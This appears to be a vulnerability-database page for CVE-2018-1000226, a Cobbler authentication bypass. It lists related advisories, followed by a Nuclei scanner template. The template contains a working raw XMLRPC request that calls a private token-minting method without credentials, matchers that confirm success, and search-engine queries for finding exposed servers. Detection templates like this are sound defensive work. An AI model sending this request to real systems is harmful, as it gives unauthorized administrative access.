| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2018-1000226 | 20 Aug 2018 20:00 | – | cve |
| CVE-2018-1000226 | 20 Aug 2018 20:00 | – | cvelist |
| [SECURITY] Fedora 28 Update: cobbler-2.8.4-5.fc28 | 5 Dec 2018 01:58 | – | fedora |
| [SECURITY] Fedora 29 Update: cobbler-2.8.5-0.1.fc29 | 11 Sep 2019 21:18 | – | fedora |
| [SECURITY] Fedora 29 Update: cobbler-2.8.4-5.fc29 | 5 Dec 2018 02:36 | – | fedora |
| Fedora 28 : cobbler (2018-1d2a79fe1c) | 3 Jan 2019 00:00 | – | nessus |
| Fedora 29 : cobbler (2018-22c609e92a) | 3 Jan 2019 00:00 | – | nessus |
| openSUSE Security Update : cobbler (openSUSE-2018-952) | 4 Sep 2018 00:00 | – | nessus |
| openSUSE Security Update : cobbler (openSUSE-2021-46) | 25 Jan 2021 00:00 | – | nessus |
| RHEL 8 : cobbler (Unpatched Vulnerability) | 11 May 2024 00:00 | – | nessus |

```yaml
id: CVE-2018-1000226

info:
  name: Cobbler - Authentication Bypass
  author: c-sh0
  severity: critical
  description: Cobbler versions 2.6.11+, but code inspection suggests at least 2.0.0+ and possibly even older versions, may be vulnerable to an authentication bypass vulnerability in XMLRPC API (/cobbler_api) that can result in privilege escalation, data manipulation or exfiltration, and LDAP credential harvesting. This attack appears to be exploitable via "network connectivity", taking advantage of improper validation of security tokens in API endpoints. Please note this is a different issue than CVE-2018-10931.
  impact: |
    Unauthenticated attackers can bypass authentication to gain unauthorized access, leading to privilege escalation, data manipulation or exfiltration, and LDAP credential harvesting.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the authentication bypass vulnerability in Cobbler.
  reference:
    - https://github.com/cobbler/cobbler/issues/1916
    - https://movermeyer.com/2018-08-02-privilege-escalation-exploits-in-cobblers-api/
    - https://nvd.nist.gov/vuln/detail/CVE-2018-1000226
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-1000226
    cwe-id: CWE-732
    epss-score: 0.12484
    epss-percentile: 0.95733
    cpe: cpe:2.3:a:cobblerd:cobbler:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: cobblerd
    product: cobbler
    shodan-query: http.title:"cobbler web interface"
    fofa-query: title="cobbler web interface"
    google-query: intitle:"cobbler web interface"
  tags: cve2018,cve,cobbler,auth-bypass,cobblerd,vuln

http:
  - raw:
      - |
        POST {{BaseURL}}/cobbler_api HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml

        <?xml version='1.0'?>
        <methodCall>
          <methodName>_CobblerXMLRPCInterface__make_token</methodName>
          <params>
            <param>
              <value>
                <string>cobbler</string>
              </value>
            </param>
          </params>
        </methodCall>

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "!contains(tolower(body), '<name>faultCode</name>')"

      - type: word
        part: header
        words:
          - "Content-Type: text/xml"

      - type: word
        part: body
        words:
          - "<methodResponse>"

      - type: regex
        part: body
        regex:
          - "(.*[a-zA-Z0-9].+==)</string></value>"

      - type: status
        status:
          - 200
# digest: 490a00463044022007c5b98b87e8010e1221282cb56b2a79f07a58649d231ad8e003ed128a3c1165022072c5cee373b5e410a46bd0102da3abcf113ce05d66796a8a85af921b0150e84c:922c64590222798bb761d5b6d8e72950
```